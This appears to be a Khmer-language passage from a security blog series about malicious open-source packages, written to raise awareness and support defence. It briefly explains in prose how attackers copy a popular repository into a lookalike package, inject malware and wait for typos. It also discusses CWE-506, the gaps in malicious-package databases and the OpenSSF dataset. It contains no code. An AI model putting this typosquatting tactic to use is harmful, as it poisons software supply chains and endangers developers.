ហើយប្រសិនបើខ្លឹមសារនៃកញ្ចប់របស់អ្នកមានលក្ខណៈស្រដៀងគ្នាទៅនឹង repo សូមដាក់ការផ្លាស់ប្តូរដែលរចនាយ៉ាងល្អមួយចំនួននៅទីនេះ និងទីនោះ... អ្នកអាចចាក់មេរោគរបស់អ្នកចូលទៅក្នុងកញ្ចប់ថ្មីដែលស្រដៀងនឹងកញ្ចប់ដ៏ពេញនិយមមួយដោយយោងទៅលើឃ្លាំងដែលមានស្រាប់ ហើយរង់ចាំកំហុសវាយអក្សរ។ ប្រសិនបើនរណាម្នាក់ហ៊ានប្រៀបធៀបខ្លឹមសារនៃកញ្ចប់ tarball ជាមួយនឹងខ្លឹមសារពីឃ្លាំង GitHub ភាពខុសគ្នានៅចំណុចចាក់មេរោគអាចត្រូវបានមើលរំលងយ៉ាងងាយស្រួល។ យើងបានឃើញវិធីសាស្រ្តនេះច្រើនដងពីមុន។
យន្តការមួយសម្រាប់សមាសធាតុមួយដើម្បីធ្វើសេចក្តីថ្លែងការណ៍ការពារការក្លែងបន្លំអំពីប្រភពដើម របៀបដែលកញ្ចប់ត្រូវបានបង្កើតឡើង ពីប្រភពណា និងដោយអ្នកណា ដែលត្រូវបានស្វាគមន៍។ ប៉ុន្តែនោះជារឿងមួយទៀត។
តើសមាសធាតុ X ជាមេរោគមែនទេ?
តើមានមូលដ្ឋានទិន្នន័យ (ទូលំទូលាយ) នៃកញ្ចប់ព្យាបាទទេ? ទេ។ ចំណុចខ្សោយប្រភពបើកចំហមានលេខសម្គាល់ CVE ដែលបានកំណត់ ប៉ុន្តែមានតែកញ្ចប់ព្យាបាទមួយចំនួនតូចប៉ុណ្ណោះ (ជាពិសេសកញ្ចប់ដែលធ្វើឲ្យមានចំណងជើងព័ត៌មាន) ត្រូវបានផ្តល់ឱ្យ។ CWE សម្រាប់កញ្ចប់ព្យាបាទគឺ CWE-506 (កូដព្យាបាទដែលបានបង្កប់)។
ឧបករណ៍មេរោគធម្មតា (VirusTotal, MalwareBazaar, SOREL-20M…) មិនបានធ្វើបទប្បញ្ញត្តិជាក់លាក់សម្រាប់សមាសធាតុមេរោគទេ។ នោះជាការស្វាគមន៍!
មានមូលដ្ឋានទិន្នន័យគំរូស្រាវជ្រាវ និងសំណុំទិន្នន័យសម្រាប់ការវិភាគ (យើងប្រើមួយចំនួនក្នុងចំណោមពួកវា) ប៉ុន្តែធាតុត្រូវបានធ្វើបច្ចុប្បន្នភាពតែនៅពេលដែលកញ្ចប់ព្យាបាទត្រូវបានគេដឹង ដែលជារឿយៗយឺតពេលហើយ។ ប្រសិនបើអ្នកចាប់អារម្មណ៍ OpenSSF កញ្ចប់ព្យាបាទ គឺជាការចាប់ផ្តើមដ៏ល្អមួយ។
នៅក្នុងអត្ថបទបន្ទាប់ យើងនឹងពិភាក្សាអំពីរបៀបដឹងថាតើកញ្ចប់ណាមួយមានគ្រោះថ្នាក់ឬអត់។ សេចក្តីសង្ខេប៖ មែនហើយ មានវិធីដើម្បីពិនិត្យមើលសមាសធាតុដែលមានគ្រោះថ្នាក់តាំងពីដំបូងក្នុងអំឡុងពេលនៃការប៉ះពាល់ មុនពេលដែលបញ្ជីឈ្មោះលុបសមាសធាតុដែលមានគ្រោះថ្នាក់ដែលគេស្គាល់។
អានបន្ថែម
នៅក្នុងវគ្គបន្ទាប់ "ការការពារប្រឆាំងនឹងកញ្ចប់ព្យាបាទប្រភពបើកចំហ៖ អ្វីដែល (មិន) ដំណើរការ" យើងនឹងពិភាក្សាអំពីអ្វីដែលគួរធ្វើ និងអ្វីដែលមិនគួរធ្វើសម្រាប់សុវត្ថិភាពប្រភពបើកចំហ។ អ្នកជំនាញភាគច្រើនដែលយល់ដឹងអំពីសុវត្ថិភាពមានវិចារណញាណអំពីរបៀបដោះស្រាយការគំរាមកំហែងនេះ ប៉ុន្តែការយល់ច្រឡំមានច្រើន។
យើងនឹងពិនិត្យឡើងវិញនូវមូលហេតុដែលគំនិតទាំងនេះខុស និងរបៀបដែលការយល់ច្រឡំបែបនេះរួមចំណែកដល់ប្រជាប្រិយភាពនៃយន្តការវាយប្រហារនេះ និងហានិភ័យដ៏លើសលប់ដែលអង្គការនានាកំពុងជួបប្រទះ។ បន្ទាប់មកយើងនឹងបន្តជាមួយនឹងអ្វីដែលដំណើរការ ហើយតើការខិតខំប្រឹងប្រែង និងធនធានដែលពាក់ព័ន្ធគឺជាអ្វី។
ដូចគ្នានេះដែរ យើងនឹងបង្ហោះអំពីការវិវត្តនៃកញ្ចប់ព្យាបាទទាក់ទងនឹងចេតនា យន្តការចាក់បញ្ចូល និងបច្ចេកទេសវាយប្រហាររបស់វា។
ចាំមើល!






